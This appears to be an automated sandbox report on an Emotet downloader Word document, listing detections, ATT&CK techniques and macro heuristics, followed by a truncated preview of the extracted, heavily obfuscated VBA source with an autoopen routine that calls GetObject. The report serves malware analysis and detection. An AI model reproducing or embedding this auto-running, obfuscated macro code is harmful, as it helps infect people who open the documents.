MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of critical ClamAV detection for 'Doc.Downloader.Emotet-6915304-0' strongly indicates Emotet. High-severity heuristics for VBA macros, specifically the AutoOpen macro and GetObject calls, confirm the malicious intent. The VBA script itself, though heavily obfuscated, is designed to execute code, likely downloading a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6915304-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6915304-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26815 bytes |
SHA-256: b3b76a38fd42a3c8d14464668e75ca94b2bcfb80e3e3d930ae0cd49462646cf9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uAA_BwUw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JkAAAU"
Attribute VB_Base = "0{52DC096B-751C-490D-9C1A-78F51476E10E}{2E2BCE39-5C4C-4F45-B514-166935CD0570}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UDAU4_A"
Attribute VB_Base = "0{DD517C70-0D77-4583-B0D8-AAF8343168E4}{A96A2C5C-DB79-4BD9-AB54-6E853EE4CD67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "qQDCcZ"
Function f_4xUA()
If SDBGAA = S1BAwQD Then
Cw1QD1B = (67233139 - lBD_cUA * q_AD1AX * CDate(460536452))
VAD4AAGA = o14XAB4A / Oct(CABG1oxB) - IBQAwc * CDbl(630054528) / BACAcA * Fix(531535278 * Log(j_ACAAAA)) / RAAAQ_B * Chr(941501060) * 522680727 * Sgn(mwUcQBDB / Log(609474635))
End If
If iAB_DA = cBZxDX Then
ZDUAACAx = (6437404 - QDAA14QG * zAAAGAZ * CDate(498833930))
WABwD_A = kQA_UwxA / Oct(VBZAXQ) - lDxQQkU * CDbl(501435334) / WABAUC * Fix(74420857 * Log(i_XAxA1)) / vBAGACA1 * Chr(705875475) * 162258319 * Sgn(CXAQ_G / Log(366675646))
End If
If Q1AAD_ = wB1UDoC Then
zAQC1AU = (307129179 - oAQxBZ * wDDDwC * CDate(401025812))
MwBACA = VG1AxUC / Oct(DkAAAA) - wUA4DAQ * CDbl(619277582) / DBAAZAA * Fix(429371760 * Log(NCAUADAA)) / pAZBcw * Chr(793992921) * 785684208 * Sgn(mAAAooxw / Log(615865300))
End If
If QDAAk4Z = MXCw4CAo Then
SBkcxAc = (509808275 - qUXAAAAA * RUxZAA * CDate(332931167))
R_GAXDBX = EkDcAB / Oct(Qc1ABxDA) - jXUZAAX_ * CDbl(120054638) / dGkA_A * Fix(27879187 * Log(zACAxABX)) / OkAABXC4 * Chr(856534805) * 435271648 * Sgn(mDcAAAA / Log(388011923))
End If
If vkAZDUAU = CQXB1C Then
zcBUBx = (722373790 - XCAAUDxA * s4G1XXA * CDate(935188457))
NAAUA_ = LAUQBC / Oct(CGAAXZA) - lAUDZQ * CDbl(73317707) / aGwAwAZQ * Fix(121284590 * Log(DAUUAAG1)) / nAXZUA * Chr(156503795) * 852814676 * Sgn(Rxc_wwk_ / Log(731766567))
End If
If zAAAXAA = hwBcDAU Then
JZUDAkAQ = (543694291 - QABB1A * PBwUkcAA * CDate(163874068))
DAAXAAQ = pxAQGAAU / Oct(jAUGQX) - iDZQAAXU * CDbl(493859892) / oxQQAC * Fix(295722000 * Log(B1CoGAB)) / IoxBxAQA * Chr(12592245) * 106550423 * Sgn(PADAocA / Log(371327178))
End If
If zZDDkX = iACZB4xc Then
FB_X44w = (560486909 - qCDZA1BD * DAwGXkA * CDate(120363099))
T4A_oA = uZAQBkBA / Oct(kAxG_A1) - oxZADA4 * CDbl(610300145) / u4_QA_x_ * Fix(520962759 * Log(qQoBUA)) / H4XUUQAU * Chr(226037469) * 43318243 * Sgn(aGCDowZX / Log(176466882))
End If
End Function
Sub autoopen()
On Error Resume Next
If OGGA1BDA = iDAD1Q Then
HkxBoCA = (21443318 - pX4__A * jABAUB * CDate(761750024))
YAwCAA = BQAAUA1 / Oct(bUAXA1wX) - uDU_DAA * CDbl(664833741) / RDxAxABU * Fix(301960582 * Log(PZCxDQ)) / ocQBQAU4 * Chr(302494254) * 370833630 * Sgn(MAQAAUDX / Log(204385647))
End If
If CA4cBUQX = ADBAQAAD Then
JQxDoBU = (562639347 - WAAQZG * KBXAcoo * CDate(351445518))
MZUcXkAZ = Fc1c_DA / Oct(QABQAo) - BBAwQU * CDbl(702444548) / zABUUx * Fix(424656330 * Log(KAXU4A)) / rAUCAD * Chr(705662023) * 896524291 * Sgn(F1B14GwA / Log(981769319))
End If
If fBC4QAA = PGkAcAGU Then
oBBAAZ = (26999746 - M_1CAQ * Kwo_1wAG * CDate(195854571))
dQUXZUD = GADAUUCD / Oct(QQAB__AQ) - bAA1A1A * CDbl(531575438) / MUc_BoAA * Fix(80612555 * Log(zG_ADA)) / lUC4AA * Chr(87562782) * 878043131 * Sgn(EAUDXZ / Log(605341966))
End If
Set CAXwcUo_ = GetObject(JkAAAU.iQDc4A.Text + UDAU4_A.qAAAXUAo + JkAAAU.iQDc4A)
If iAkAAAB_ = M4cABcAk Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.